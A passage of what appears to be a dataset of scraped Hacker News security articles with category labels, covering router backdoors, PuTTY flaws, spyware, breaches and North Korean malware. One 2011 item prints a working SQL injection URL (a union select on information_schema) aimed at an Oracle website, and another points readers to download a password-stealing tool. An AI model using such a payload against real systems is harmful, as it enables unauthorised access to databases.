arbitrary commands with root privileges. Cisco Router Management Interface — Cisco's RV110W, RV130W, and RV215W Routers contains a denial-of-service vulnerability that could allow an unauthenticated attacker to cause a reload of an affected device. Another flaw in this product affected by a medium severity issue that could expose the list of devices that are connected to the guest network to remote attackers. ",Vulnerability SYNful Knock: Backdoor Malware Found in Cisco Routers,https://thehackernews.com/2015/09/cisco-router-backdoor.html,"Mandiant, a FireEye sister concern has been involved in researches related to cyber defense. In their recent findings, a backdoor malware named SYNful Knock identified as the one compromising the principles of Cisco routers with features such as... ...Having an everlasting effect, i.e. Serious Persistence. What?- The malicious program is implanted in the router illicitly through the device's firmware (regardless of the vendor). The goal is achieved by modifying the router's firmware image, which exists even after the device gets a reboot. How?- installing SYNful Knock in Cisco 1841 router, Cisco 2811 router, and Cisco 3825 router. Affected areas- 14 instances in 4 countries including India, Mexico, Ukraine, and the Philippines. Impact- the backdoor is backed up with such abilities that can compromise the availability of other hosts and access to sensitive data in an organization. ""The theoretical nature of router-focused attacks created a mindset within our industry to focus on building more walls around the perimeter, leaving many organizations exposed when it comes to foundational devices like routers,"" stated FireEye. With this statement, we can imagine how dangerous is this backdoor! As the implant is triggered by modifying the Cisco Inter-networked operating system (IOS), thus the implant activates in-capabilities in the Cisco victim like: It allows the attacker to install various functional modules from the anonymity of the internet. It provides unrestricted access using a wrapped backdoor password. It delivers modules via the HTTP protocol and not HTTPS. The controller (attacker) enables the TCP packets have a non-standard sequence and corresponding acknowledgment numbers. The modules are disguised as independent executable code or hooks within the router's IOS with functionality similar to the backdoor password. The backdoor password provides access to the router through the console and Telnet. Also, The Hacker News (THN) reported about vulnerabilities in Belkin routers leading to privilege escalation and cyber attacks like man-in-the-middle attack. This is considered as an evident example where routers are being compromised on a large level. Besides this, a document stating possibilities of how Cisco's IOS can be compromised and side-by-side protected against any malware can be seen here. To get insights of this stealthy malware visit the stepwise demonstration executed by Mandiant. ",Malware Oracle website vulnerable to SQL injection,https://thehackernews.com/2011/07/oracle-website-vulnerable-to-sql.html,"Oracle website vulnerable to SQL injection vulnerability Oracle database website itself vulnerable to SQL injection attack. The website having a loophole by which any attacker can easily hack into it. The vulnerability is found and submitted by Hacker ""m@m@"". Oracle provides the world's most complete, open, and integrated business software and hardware systems to more than 370,000 customers including 100 of the Fortune 100 that represent a variety of sizes and industries in more than 145 countries around the globe. The combination of Oracle and Sun means that customers can benefit from fully integrated systems the entire stack, from applications to disk that are faster, more reliable, and lower cost. But the website now itself compromised with SQL injection attack. I am providing the link and a screen sort show that you can easily sort out the vulnerability. Here is the link: https://labs.oracle.com/dmp/patents.php?uid=mherlihy'%20and%201=0%20union%20select%201,2,table_name,4%20from%20information_schema.tables--%20-&show=all Also Iframe Injection & Blind SQL Injection vulnerability on Apple.com exposed by Idahc(lebanese hacker) : Read here ",Vulnerability PuTTY Releases Important Software Update to Patch 8 High-Severity Flaws,https://thehackernews.com/2019/03/putty-software-hacking.html,"The popular SSH client program PuTTY has released the latest version of its software that includes security patches for 8 high-severity security vulnerabilities. PuTTY is one of the most popular and widely used open-source client-side programs that allows users to remotely access computers over SSH, Telnet, and Rlogin network protocols. Almost 20 months after releasing the last version of its software, the developers of PuTTY earlier this week released the latest version 0.71 for Windows and Unix operating systems. According to an advisory available on its website, all previous versions of the PuTTY software have been found vulnerable to multiple security vulnerabilities that could allow a malicious server or a compromised server to hijack client's system in different ways. Here below I have listed all 8 vulnerabilities with brief information that PuTTY 0.71 has patched: 1) Authentication Prompt Spoofing — Since PuTTY doesn't have a way to indicate whether a piece of terminal output is genuine, the user-interface issue could be exploited by a malicious server to generate a fake authentication prompt at the client side, prompting victims to enter their private key passphrases. ""If the server had also acquired a copy of your encrypted key file (which, for example, you might have considered safe to copy around because it was securely encrypted), then this would give it access to your private key,"" the advisory explains. 2) Code Execution via CHM Hijacking — When a user launches the online help within the PuTTY GUI tools, the software tries to locate its help file alongside its own executable. This behavior could allow an attacker to trick the user into executing malicious code on the client system via the hijacking CHM file. ""If you were running PuTTY from a directory that unrelated code could arrange to drop files into, this means that if somebody contrived to get a file called putty.chm into that directory, then PuTTY would believe it was the real help file, and feed it to htmlhelp.exe."" 3) Buffer Overflow in Unix PuTTY Tools — According to the advisory, if a server opens too many port forwardings, PuTTY for Unix does not bounds-check the input file descriptor it collects while monitoring the collections of active Unix file descriptors for activity, leading to a buffer overflow issue. ""We don't know if this was remotely exploitable, but it could at least be remotely triggered by a malicious SSH server, if you enabled any of the options that allow the server to open a channel: remote-to-local port forwarding, agent forwarding or X11 forwarding,"" the advisory says. 4) Reusing Cryptographic Random Numbers — This issue resides in the way cryptographic random number generator in PuTTY, occasionally using the same batch of random bytes twice. ""This occurred because of a one-byte buffer overflow in the random pool code. If entropy from an external source was injected into the random pool exactly when the current-position index was pointing at the very end of the pool, it would overrun the pool buffer by one byte and overwrite the low byte of the position index itself."" 5) Integer Overflow Flaw — All prior versions of PuTTY suffers an Integer overflow issue due to missing key-size check-in RSA key exchange. A remote server can trigger the vulnerability by sending a short RSA key, leading to an integer overflow and uncontrolled overwriting of memory. PuTTY developers are not sure if this flaw can be exploited to gain control over the client, but since the issue occurs during key exchange and happens before host key checking, the overflow can be induced by a MitM attack even if the middle man does not know the correct host key. So even if you trust the server you think you are connecting to, you are not safe."" 6, 7 and 8) Terminal DoS Attacks — Last three vulnerabilities in PuTTY allows a server to crash, or slow down client's terminal by sending different text outputs. Servers can send a long unbroken string of Unicode characters to the client's terminal, which could lead to a denial-of-service attack by causing the system to allocate potentially unlimited amounts of memory. The second DoS attack can be triggered by sending combining characters, double-width text, an odd number of terminal columns, and GTK to the client's terminal in output. In the third DoS attack, by sending width-2 characters used by Chinese, Japanese and Korean to the client, PuTTY's terminal emulator can be forced to crash. If you use PuTTY, make sure you download and use the latest version of it. ",Vulnerability "South Korea hit by Android Trojan, Malware in Gaming apps and DDoS attack",https://thehackernews.com/2013/10/south-korea-hit-by-android-trojan.html,"Last Tuesday, The National Police Agency of South Korea warned the people that many Malware infected video games being offered in the South Korean markets with the purpose of launching Cyber attacks on the Country. That Malware is collecting location data and IP addresses of infected users and according to experts, malware is sending data back to its master servers based in North Korea. Just today the Korea's largest anti-virus software firm AhnLab confirmed that they have detected distributed denial-of-service (DDoS) attacks on local companies' websites. According to the report, about 16 websites of 13 companies, including Daum, MSN and the JoongAng Ilbo newspaper had been affected. AhnLab said that some 10-thousand computers have been hit, mainly because they failed to install a vaccination program or update an existing one since the last cyber attack in July. The attack was detected around 4:00 p.m. on Thursday, infecting around 10,000 computers until Friday. It is possible that same infected systems were used to launch DDoS attacks today. Police advise the public to do not download gaming programs from unverified sources and to keep their Antivirus up to date. Yesterday, we reported about another malicious campaign against South Korean Android users, where a Banking Trojan is specifically targeting South Korean banking applications for stealing user credentials. In March, North Korea was suspected as responsible for for a malware attack that simultaneously wiped data from tens of thousands of South Korean computers. ",Cyber_Attack iOS Sandbox Vulnerability Puts Enterprise Data at Risk,https://thehackernews.com/2015/08/apple-iphone-hacking.html,"""Change is the only constant thing,"" as it is known could be now modified as ""Change is the only constant thing*,"" where the * means Terms and conditions apply! A change (Mobile Device Management solutions-MDM, Bring Your Own Device-BYOD) was brought to the organizations, (which later became necessities) for smooth workflow and management of an organization; where resides mobile and other computing devices in masses. The devices, as well as the MDM solutions, are at risk, as reported. Security researchers at Appthority Mobile Threat Team, have found a vulnerability in the sandbox app within the Apple's iOS versions prior to 8.4.1, which makes the configuration settings of managed applications to be openly accessed by anyone. QuickSand – Loophole in Sandbox The vulnerability is assigned CVE-2015-5749 and is named as 'QuickSand' because of the loophole being present in the Sandbox. Mobile Device Management (MDM) refers to managing the deployment, security and integration of all the mobile devices, including smartphones, tablets, and laptops, in an organization. The aim of MDM solutions is to increase the use of mobile devices by keeping them secure within the enterprise while simultaneously protecting the corporate network. MDM solutions are mostly dependent on vendors who implement the services based on their devices' management features. MDM and EMM (Enterprise Mobility Management) solutions are delivered by vendors like FancyFon, AirWatch, MobileIron and AmTel MDM, allowing organizations to install corporate apps, including configuration and credentials, to its mobile devices. This poses as a solution for employees to get an easy access to corporate resources. Now, the researchers claim this violation is capable of affecting all MDM clients as well as any mobile apps distributed via an MDM in a corporate environment that use the 'Managed App Configuration' setting to configure and store private settings and information. Here's what the researchers at Appthority wrote in a blog post: The underlying issue with our critical sandbox violation discovery is that not only can a mobile app (or the MDM app itself) have access to this sensitive set-up and authentication information stored on the device, but anyone (or any app on any device) can also see the credential [data] on the mobile device as it is stored 'world readable'. How the Attack Works? The attackers can fool the users - in an environment where the MDM solution has been implemented - in two ways: Pushing a malicious app in the complete organization, imitating as a productivity app that many users may install. Targeting a particular user and luring him into various cyber attacks like phishing. This is a vital situation, where chances of an organization becoming victims of the severe cyber attack are high. Sensitivity and size of the information being managed using MDM solutions do matter. As today, the vulnerability may not be that critical in nature but it has certainly opened gates for the potential attackers to get away with the data and information. Appthority and Apple security have worked together to the fix the vulnerability, which has been patched but for the iOS version 8.4.1 as of now. Further, Appthority Mobile Threat Team has demonstrated the weakness with the MDM and provides some recommendations; you can link to their official blog for in-depth details. ",Vulnerability Malware Swipes Rocket Data from Japanese space agency,https://thehackernews.com/2012/12/malware-swipes-rocket-data-from.html,"Japan's space agency says it is investigating a possible leak of data about its Epsilon rocket due to a computer virus. Malware Case : The Japan Aerospace Exploration Agency said the virus, in a computer at its Tsukuba Space Centre, north-east of Tokyo, was found to be secretly collecting data and sending it outside the agency. JAXA said in a statement that information about the Epsilon, due to be launched next year, its M-5 rocket and H2A and H2B rockets may have been compromised. The agency said that it was unclear if the virus was a cyberattack. The agency said it is tightening security to prevent any further leaks. China behind this Cyber Attack ? Recently, however, Japanese defense companies have been targets of similar information-stealing viruses, some of which had been traced back to China. The Epsilon, whose first launching is scheduled for next autumn, will also feature new technology that will allow it to be remotely controlled by a personal computer. Japan is hoping to compete with the U.S., Russia, Europe and others as a satellite launch vehicle provider and has developed the Epsilon to reduce costs and speed up launch times. ",Malware Android based hacking tool to steal passwords from connected computers,https://thehackernews.com/2013/07/android-based-hacking-tool-to-steal.html,"A recently discovered new form of Android malware called USB Cleaver can not only infect your smartphone, but also targets your PC to steal sensitive information from it. A hacking tool discovered by analysts at F-Secure, which is capable of stealing information from a connected Windows machine. USBCleaver seems to be designed to facilitate a targeted attack by gathering details that would be helpful in a later infiltration attempt. To use the application, hacker must install an application called USB Cleaver on his Android device. Once executed, the app downloads a ZIP file from a remote server and then unzips the downloaded file to the following location: /mnt/sdcard/usbcleaver/system folder. Tools is design to steal information like Browser passwords (Firefox, Chrome and IE), PC's Wi-Fi password, The PC's network information etc. When the device is then plugged into a PC, /mnt/sdcard is mounted and, if autorun is enabled, go.bat and the payload are executed. The app allows the user to select what type of information should be harvested. The utilities save their results in /mnt/sdcard/usbcleaver/logs which the app user can view later by clicking ""Log files"" in the app. Most older Windows systems need to have mobile drivers manually installed in order for this attack to work. You can Download USB Cleaver here. ",Malware Stuxnet virus also infected Chevron's IT network,https://thehackernews.com/2012/11/stuxnet-virus-also-infected-chevrons-it.html,"Stuxnet, a sophisticated computer virus created by the United States and Israel, to spy on and attack Iran's nuclear enrichment facilities in Natanz also infected Chevron 's network in 2010, immediately after it spread into the wild. This Government created virus Now Infecting Corporations also. Chevron oil giant found the virus in its systems after the malware's existence was first reported in a blog post in July 2010, according to Mark Koelmel, general manager of the earth-sciences department at the big U.S. oil company. The U.S. government has never officially acknowledged the Stuxnet program. Stuxnet which was designed to attack computer systems designed by German industrial giant Siemens for managing water supplies, oil rigs, power plants and other critical infrastructure has turned up in other countries. According to the Wall Street Journal, Chevron's experience with Stuxnet appears to be the result of the malware's unintentional release into cyberspace, much like an experimental virus escaping from a medical lab. ""Two years ago, our security systems identified the Stuxnet virus. We immediately addressed the issue without incident,"" a Chevron representative said. Even though Stuxnet targeted industrial facilities, it also infected regular PCs and as a result was discovered in June 2010, about a year after the earliest known version was believed to be created. On other hand, U.S. officials have blamed Iran for creating the Shamoon virus, which was responsible for a cyber attack that infected more than 30,000 computers at Saudi Arabian oil company Saudi Aramco and Qatar's natural gas firm Rasgas in mid-August. ""I think the downside of what they did is going to be far worse than what they actually accomplished,"" Chevron . ",Cyber_Attack US retailer Neiman Marcus confirmed data breach after TARGET,https://thehackernews.com/2014/01/us-retailer-neiman-marcus-confirmed_12.html,"The TARGET Hack was not the only massive Data breach that happened during the last Black Friday, but also other three major US Retailers were also hacked. Recently, Neiman Marcus also confirmed a data breach that involves Credit card theft from its customers during the holiday shopping season, using similar techniques to the one that penetrated Target last month. Neiman Marcus has 79 stores and reported total sales of $1.1 Billion in the Q4 2013. Neiman Marcus revealed that its customers are at risk after hackers breached servers of the company and accessed the payment information of those who visited its stores. The company is working to inform customers whose cards have been used for fraudulent purchases, but differently from the case of retailer Target, the company hasn't provided information on the nature of data leaked and on the number of customer records exposed. Neiman Marcus spokesperson Ginger Reeder announced that the company does not yet know the cause, size or duration of the data breach. She also added that there is no evidence of a possible impact on those shoppers who purchased from the online stores. The entirety of the company's formal statement is as follows: ""Neiman Marcus was informed by our credit card processor in mid-December of potentially unauthorized payment card activity that occurred following customer purchases at our Neiman Marcus Group stores. We informed federal law enforcement agencies and are working actively with the U.S. Secret Service, the payment brands, our credit card processor, a leading investigations, intelligence and risk management firm, and a leading forensic firm to investigate the situation. On January 1st, the forensics firm discovered evidence that the company was the victim of a criminal cyber-security intrusion and that some customers' cards were possibly compromised as a result. We have begun to contain the intrusion and have taken significant steps to further enhance information security. The security of our customers' information is always a priority and we sincerely regret any inconvenience. We are taking steps, where possible, to notify customers whose cards we know were used fraudulently after making a purchase at our store."" Neiman Marcus was informed in mid-December by its credit card processor and subsequently reported the data breach to law enforcement. The company apologized to its customers for the incident and confirmed that it is working to notify those whose cards were used fraudulently after visits to Neiman Marcus stores. Cyber criminal activities are more frequent during the holiday season, experts hypothesized also a possible connection between this data breach and the one occurred to Target retailer. ""In the wake of the Target breach, customers, lawmakers and consumer advocates have stepped up calls for Congress to set guidelines on how merchants should protect consumer data. In a statement Friday, Sen. Edward J. Markey (D-Mass.) said that the Target breach illustrates a need for clear, strong privacy and security standards across all industries. When a number equal to nearly one-fourth of America's population is affected by a data breach, it is a serious concern that must be addressed,"" he said. Are Target and Neiman Marcus two isolated cases? ""Target Corp and Neiman Marcus are not the only U.S. Retailers whose networks were breached over the holiday shopping season last year, according to sources familiar with attacks on other merchants that have yet to be publicly disclosed."" reported a post by Reuters. According to the people familiar with the attacks, the technique adopted by attackers is the same to the one against Target. More breaches may have yet to come in light and rumors refers similar incidents may have occurred earlier last year. There is the suspect the perpetrators may be the same as those who attacked Target retailer, likely the ring leaders are from Eastern Europe. Security analysts expect an increment for illicit activities related to credit and debit card abuses, and they also sustain that it can be more difficult for retailers and credit card issuers to detect patterns of unusual spending. ",Data_Breaches Malware called 'Eurograbber' steals 36 million Euros,https://thehackernews.com/2012/12/malware-called-eurograbber-steals-36.html,"A new version of the Zeus botnet was used to steal about $47 million from European banking customers in the past year. This Zeus variant Trojan is blamed for attacks that stole more than 36 million Euros ($47 million U.S. dollars) from an estimated 30,000 consumer and corporate accounts at European banks. Dubbed ""Eurograbber"" is more than just another banking Trojan. It's an exploitation of fundamental online banking authentication practices that could strike any institution. With the phone number and platform information, the attacker sends a text message to the victim's phone with a link to a site that downloads what it says is ""encryption software"" for the device. Customers become victims of Eurograbber by clicking on malicious links that may come in phishing-attack emails and then after injecting scripts to browser , the malware intercepts two-step authentication text messages sent to customers' phones. Customers at an estimated 30 banks fell victims to the cyberheist. The amounts stolen ranged from between 500 to 250,000 euros ($650 to $327,000) and were removed from individual and corporate accounts in Italy, Spain, Germany and The Netherlands. As online and mobile banking continue to grow, we will see more targeted attacks in this area, and Eurograbber is a prime example. ",Malware "Google+ is Shutting Down After a Vulnerability Exposed 500,000 Users' Data",https://thehackernews.com/2018/10/google-plus-shutdown.html,"Google is going to shut down its social media network Google+ after the company suffered a massive data breach that exposed the private data of hundreds of thousands of Google Plus users to third-party developers. According to the tech giant, a security vulnerability in one of Google+'s People APIs allowed third-party developers to access data for more than 500,000 users, including their usernames, email addresses, occupation, date of birth, profile photos, and gender-related information. Since Google+ servers do not keep API logs for more than two weeks, the company cannot confirm the number of users impacted by the vulnerability. However, Google assured its users that the company found no evidence that any developer was aware of this bug, or that the profile data was misused by any of the 438 developers that could have had access. ""However, we ran a detailed analysis over the two weeks prior to patching the bug, and from that analysis, the Profiles of up to 500,000 Google+ accounts were potentially affected. Our analysis showed that up to 438 applications may have used this API,"" Google said in blog post published today. The vulnerability was open since 2015 and fixed after Google discovered it in March 2018, but the company chose not to disclose the breach to the public—at the time when Facebook was being roasted for Cambridge Analytica scandal. Though Google has not revealed the technical details of the security vulnerability, the nature of the flaw seems to be something very similar to Facebook API flaw that recently allowed unauthorized developers to access private data from Facebook users. Besides admitting the security breach, Google also announced that the company is shutting down its social media network, acknowledging that Google+ failed to gain broad adoption or significant traction with consumers. ""The consumer version of Google+ currently has low usage and engagement: 90 percent of Google+ user sessions are less than five seconds,"" Google said. In response, the company has decided to shut down Google+ for consumers by the end of August 2019. However, Google+ will continue as a product for Enterprise users. Google Introduces New Privacy Controls Over Third-Party App Permissions As part of its ""Project Strobe,"" Google engineers also reviewed third-party developer access to Google account and Android device data; and has accordingly now introduced some new privacy controls. When a third-party app prompts users for access to their Google account data, clicking ""Allow"" button approves all requested permissions at once, leaving an opportunity for malicious apps to trick users into giving away powerful permissions. But now Google has updated its Account Permissions system that asks for each requested permission individually rather than all at once, giving users more control over what type of account data they choose to share with each app. Since APIs can also allow developers to access users' extremely sensitive data, like that of Gmail account, Google has limited access to Gmail API only for apps that directly enhance email functionality—such as email clients, email backup services and productivity services. Google shares fell over 2 percent to $1134.23 after the data breach reports. ",Vulnerability 'Exodus' Surveillance Malware Found Targeting Apple iOS Users,https://thehackernews.com/2019/04/exodus-ios-malware.html,"Cybersecurity researchers have discovered an iOS version of the powerful mobile phone surveillance app that was initially targeting Android devices through apps on the official Google Play Store. Dubbed Exodus, as the malware is called, the iOS version of the spyware was discovered by security researchers at LookOut during their analysis of its Android samples they had found last year. Unlike its Android variant, the iOS version of Exodus has been distributed outside of the official App Store, primarily through phishing websites that imitate Italian and Turkmenistani mobile carriers. Since Apple restricts direct installation of apps outside of its official app store, the iOS version of Exodus is abusing the Apple Developer Enterprise program, which allows enterprises to distribute their own in-house apps directly to their employees without needing to use the iOS App Store. ""Each of the phishing sites contained links to a distribution manifest, which contained metadata such as the application name, version, icon, and a URL for the IPA file,"" the researchers say in a blog post. ""All these packages used provisioning profiles with distribution certificates associated with the company Connexxa S.R.L."" Though the iOS variant is less sophisticated than its Android counterpart, the spyware can still be able to exfiltrate information from targeted iPhone devices including, contacts, audio recordings, photos, videos, GPS location, and device information. The stolen data is then transmitted via HTTP PUT requests to an endpoint on the attackers controlled command and control server, which is the same CnC infrastructure as the Android version and uses similar communications protocols. Several technical details indicated that Exodus was ""likely the product of a well-funded development effort"" and aimed to target the government or law-enforcement sectors. ""These included the use of certificate pinning and public key encryption for C2 communications, geo-restrictions imposed by the C2 when delivering the second stage, and the comprehensive and well-implemented suite of surveillance features,"" the researchers say. Developed by Italy-based company called Connexxa S.R.L., Exodus came to light late last month when white hat hackers from Security Without Borders discovered nearly 25 different apps disguised as service applications on Google Play Store, which the tech giant removed after being notified. Under development for at least five years, Exodus for Android usually consists of three distinct stages. First, there is a small dropper that collected basic identifying information, like the IMEI and phone number, about the targeted device. The second stage consists of multiple binary packages that deploy a well-implemented suite of surveillance functionalities. Finally, the third stage uses the infamous DirtyCOW exploit (CVE-2016-5195) to gain root control over the infected phones. Once successfully installed, Exodus can carry out an extensive amount of surveillance. The Android variant is also designed to keep running on the infected device even when the screen is switched off. While the Android version of Exodus had potentially infected ""several hundreds if not a thousand or more"" devices, it's not clear how many iPhones were infected by the iOS Exodus variant. After being notified of the spyware by the Lookout researchers, Apple revoked the enterprise certificate, preventing malicious apps from being installed on new iPhones and run on infected devices. This is the second instance in the past year when an Italian software company has been caught distributing spyware. Earlier last year, another undisclosed Italian firm was found distributing ""Skygofree,"" a dangerous Android spying tool that gives hackers full control of infected devices remotely. ",Malware "Real Identity of Hacker Who Sold LinkedIn, Dropbox Databases Revealed",https://thehackernews.com/2018/11/tessa88-russian-hacker.html,"The real identity of Tessa88—the notorious hacker tied to several high-profile cyber attacks including the LinkedIn, DropBox and MySpace mega breaches—has been revealed as Maksim Vladimirovich Donakov (Максим Владимирович Донаков), a resident of Penza, Russian Federation. In early 2016, a hacker with pseudonym Tessa88 emerged online offering stolen databases from some of the biggest social media websites in the world, including LinkedIn, MySpace, VKontakte (vk.com), Dropbox, Rambler, and Twitter, for sale in various underground hacking forums. The stolen data, taken years ago from several social media sites, included more than half a billion username and password combinations, which were then used in phishing, account takeover, and other cyber attacks. Though Tessa88's profile was active for a few months between February and May 2016, the OPSEC analysis revealed that the same person was involved in various cybercriminal activities since as early as 2012 under different aliases including ""Paranoy777,"" ""tarakan72511,"" ""stervasgoa,"" ""janer93"" and ""Daykalif."" Unmasking ""Tessa88"" Researchers with US-based threat intelligence firm Recorded Future's Insikt Group used a combination of their own data, dark web activity, multiple chats and email accounts associated with Tessa88 to find a connection between his other online aliases, and collected information from publicly available sources to unveil his true identity. Tarakan72511 → Tessa88 → Donakov Researchers identified an online account ""tarakan72511"" on Imgur, a popular online image sharing service, who posted screenshots of discussions regarding the Yahoo and Equifax breaches. On the same account Tarakan72511 also posted his real picture titled ""tessa88"" in 2017, which links Donakov with tarakan72511 and tessa88. Tessa88 → Donakov with Guy Fawkes mask Another member of an underground forum, TraX, shared a photo of Tessa88, showing a man on the car roof with his face hidden behind Guy Fawkes mask, whose body type and hairstyle resemble with the picture of Tessa88 posted by tarakan72511. Tarakan72511 → Russian Car with Guy Fawkes mask → Tessa88 Researchers also identified a YouTube account with a similar username—Tarakan72511 Donakov—who posted a video showing someone feeding stray dogs. The video also revealed a style Guy Fawkes mask (same as worn in the picture posted by TraX) in the boot of a Mitsubishi Lancer car with the registration number K652BO 58. All Evidences Leads to Maksim Vladimirovich Donakov After exploring several confidential sources, Penza records, and Russian crime database, researchers find Tessa88 as Maksim Vladimirovich Donakov (date of birth: 02/07/1989), whose persona matches with the YouTube username 'Donakov,' Mitsubishi Lancer and person revealed in Imgur picture. Maksim Vladimirovich Donakov committed several crimes in Russia, including a car accident while driving a Mitsubishi Lancer in 2017. He also served jail time after committing another crime in 2014. After the comprehensive investigation, Recorded Future, with a ""high degree of confidence, concluded that Donakov is the man behind the sale of the extensive databases, including 32 million Twitter accounts, 360 million Myspace credentials, and 500 million Yahoo accounts. It is also believed that Donakov have sold data stolen from VKontakte (vk.com), Mobango, Badoo, QIP, and Rambler on various underground forums. At the time of a series of so-called 'mega breaches' in 2016, another online alias that came up was Peace_of_Mind — a separate hacker who was seen selling 117 Million LinkedIn emails and passwords and 200 million Yahoo accounts in 2016 on the currently defunct TheRealDeal Market. According to Recorded Future, Tessa88 and Peace_of_Mind made an agreement in May 2016 on sharing some of the stolen databases in a ""likely attempt to expedite monetizing the massive amount of data between the two."" The LinkedIn breach resulted in the arrest of Russian national Yevgeniy Nikulin (Евгений Никулин) in October 2016 by the FBI in the Czech Republic, who was later extradited to the United States. However, until today, no clear evidence links Nikulin to Peace_of_Mind. It should be noted that neither Tessa88 nor Peace_of_Mind was the actual hacker who breached the aforementioned companies. Both were involved in the selling of the already stolen databases, but not in performing the actual hacks, though the exact methods used to steal the databases are also unknown. Recorded Future hopes that the upcoming criminal case of Nikulin, who is now also a person of ""great interest"" in the US probe of Russia's meddling in the US presidential election, will shed some light on the gaps in the story. ",Cyber_Attack New OpenSMTPD RCE Flaw Affects Linux and OpenBSD Email Servers,https://thehackernews.com/2020/02/opensmtpd-email-vulnerability.html,"OpenSMTPD has been found vulnerable to yet another critical vulnerability that could allow remote attackers to take complete control over email servers running BSD or Linux operating systems. OpenSMTPD, also known as OpenBSD SMTP Server, is an open-source implementation of the Simple Mail Transfer Protocol (SMTP) to deliver messages on a local machine or to relay them to other SMTP servers. It was initially developed as part of the OpenBSD project but now comes pre-installed on many UNIX-based systems. Discovered by experts at Qualys Research Labs, who also reported a similar RCE flaw in the email server application last month, the latest out-of-bounds read issue, tracked as CVE-2020-8794, resides in a component of the OpenSMTPD's client-side code that was introduced nearly 5 years ago. Just like the previous issue, which attackers started exploiting in the wild just a day after its public disclosure, the new OpenSMTPD flaw could also let remote hackers execute arbitrary commands on the vulnerable servers with privileges of either root or any non-root user. As described in the screenshot of the advisory, the flaw can be exploited by a local or remote attacker in two ways by sending specially crafted SMTP messages, one works in the default configuration, and the second leverages email bounce mechanism. ""We developed a simple exploit for this vulnerability and successfully tested it against OpenBSD 6.6 (the current release), OpenBSD 5.9 (the first vulnerable release), Debian 10 (stable), Debian 11 (testing), and Fedora 31,"" the advisory says. ""We tested our exploit against the recent changes in OpenSMTPD 6.6.3p1, and our results are: if the ""mbox"" method is used for local delivery (the default in OpenBSD -current), then arbitrary command execution as root is still possible; otherwise (if the ""maildir"" method is used, for example), arbitrary command execution as any non-root user is possible."" However, the Qualys team has decided to withhold the exploitation details and exploit code until 26th February, giving vulnerable OpenSMTPD's users a two-day window to patch their systems. If you're also running BSD or Linux servers with a vulnerable version of the OpenSMTPD, you're advised to download OpenSMTPD 6.6.4p1 and apply the patch as soon as possible. ",Vulnerability Operator of VirusTotal Like Malware-Scanning Service Jailed for 14 Years,https://thehackernews.com/2018/09/scan4you-malware-scanner.html,"A Latvian hacker behind the development and operation of counter antivirus service ""Scan4You"" has finally been sentenced to 14 years in prison. 37-year-old Ruslans Bondars, described as a Latvian ""non-citizen"" or ""citizen of the former USSR who had been residing in Riga, Latvia,"" was found guilty on May 16 in federal court in Alexandria, during which a co-conspirator revealed he had worked with Russian law enforcement. Bondars created and ran Scan4you—a VirusTotal like online multi-engine antivirus scanning service that allowed hackers to run their code by several popular antiviruses to determine if their computer virus or malware would be flagged during routine security scans before launching them into a real-world malware campaign. While legal scanning services share data about uploaded files with the antivirus firms, Scan4you instead informed its users that they could ""upload files anonymously and promised not to share information about the uploaded files with the antivirus community."" Bondars was one of the two hackers found to have been running Scan4you from 2009 to 2016 and helping other malware authors test and improve the malware they then ""used to inflict hundreds of millions of dollars in losses on American companies and consumers."" Bondars' partner Jurijs Martisevs, who was also arrested while on a trip to Latvia and extradited to the United States, pleaded guilty to similar charges back in March this year. According to the Justice Department press release, Scan4you customers used the service to steal millions of payment cards from retail stores across the world, including the United States, which led to some $20.5 billion in losses. For instance, one Scan4you customer used the service to test malware that was subsequently used to steal approximately 40 million credit and debit card numbers, and other personal information from a US retail store, causing $292 million in losses. Another customer used Scan4you to assist the development of ""Citadel""—a widely used malware strain that infected over 11 million computers worldwide, including in the United States and resulted in over $500 million in fraud-related losses. ""Ruslans Bondars helped malware developers attack American businesses,"" said Assistant Attorney General Benczkowski. ""The Department of Justice and its law enforcement partners make no distinction between service providers like Scan4You and the hackers they assist: we will hold them accountable for all of the significant harm they cause and work tirelessly to bring them to justice, wherever they may be located."" Bondars was convicted of three counts, including conspiracy to violate the Computer Fraud and Abuse Act, conspiracy to commit wire fraud, and computer intrusion with intent to cause damage and was sentenced to 168 months in prison on Friday. Although US court never charged Bondars with direct involvement in any hacking, court documents show he used malware to rob online users and trick them into buying antivirus services they did not need. Moreover, prosecutors also say Scan4You was an ""innovation"" in malware that has inspired many copycats, which resulted in such services being readily available on the Internet. ",Malware FBI issues alert over two new malware linked to Hidden Cobra hackers,https://thehackernews.com/2018/05/north-korean-hacker-hidden-cobra.html,"The US-CERT has released a joint technical alert from the DHS and the FBI, warning about two newly identified malware being used by the prolific North Korean APT hacking group known as Hidden Cobra. Hidden Cobra, often known as Lazarus Group and Guardians of Peace, is believed to be backed by the North Korean government and known to launch attacks against media organizations, aerospace, financial and critical infrastructure sectors across the world. The group was even associated with the WannaCry ransomware menace that last year shut down hospitals and businesses worldwide. It is reportedly also linked to the 2014 Sony Pictures hack, as well as the SWIFT Banking attack in 2016. Now, the Department of Homeland Security (DHS) and the FBI have uncovered two new pieces of malware that Hidden Cobra has been using since at least 2009 to target companies working in the media, aerospace, financial, and critical infrastructure sectors across the world. The malware Hidden Cobra is using are—Remote Access Trojan (RAT) known as Joanap and Server Message Block (SMB) worm called Brambul. Let's get into the details of both the malware one by one. Joanap—A Remote Access Trojan According to the US-CERT alert, ""fully functional RAT"" Joanap is a two-stage malware that establishes peer-to-peer communications and manages botnets designed to enable other malicious operations. The malware typically infects a system as a file delivered by other malware, which users unknowingly download either when they visit websites compromised by the Hidden Cobra actors, or when they open malicious email attachments. Joanap receives commands from a remote command and control server controlled by the Hidden Cobra actors, giving them the ability to steal data, install and run more malware, and initialize proxy communications on a compromised Windows device. Other functionalities of Joanap include file management, process management, creation and deletion of directories, botnet management, and node management. During analysis of the Joanap infrastructure, the U.S. government has found the malware on 87 compromised network nodes in 17 countries including Brazil, China, Spain, Taiwan, Sweden, India, and Iran. Brambul—An SMB Worm Brambul is a brute-force authentication worm that like the devastating WannaCry ransomware, abuses the Server Message Block (SMB) protocol in order to spread itself to other systems. The malicious Windows 32-bit SMB worm functions as a service dynamic link library file or a portable executable file often dropped and installed onto victims' networks by dropper malware. ""When executed, the malware attempts to establish contact with victim systems and IP addresses on victims' local subnets,"" the alert notes. ""If successful, the application attempts to gain unauthorized access via the SMB protocol (ports 139 and 445) by launching brute-force password attacks using a list of embedded passwords. Additionally, the malware generates random IP addresses for further attacks."" Once Brambul gains unauthorized access to the infected system, the malware communicates information about victim's systems to the Hidden Cobra hackers using email. The information includes the IP address and hostname—as well as the username and password—of each victim's system. The hackers can then use this stolen information to remotely access the compromised system via the SMB protocol. The actors can even generate 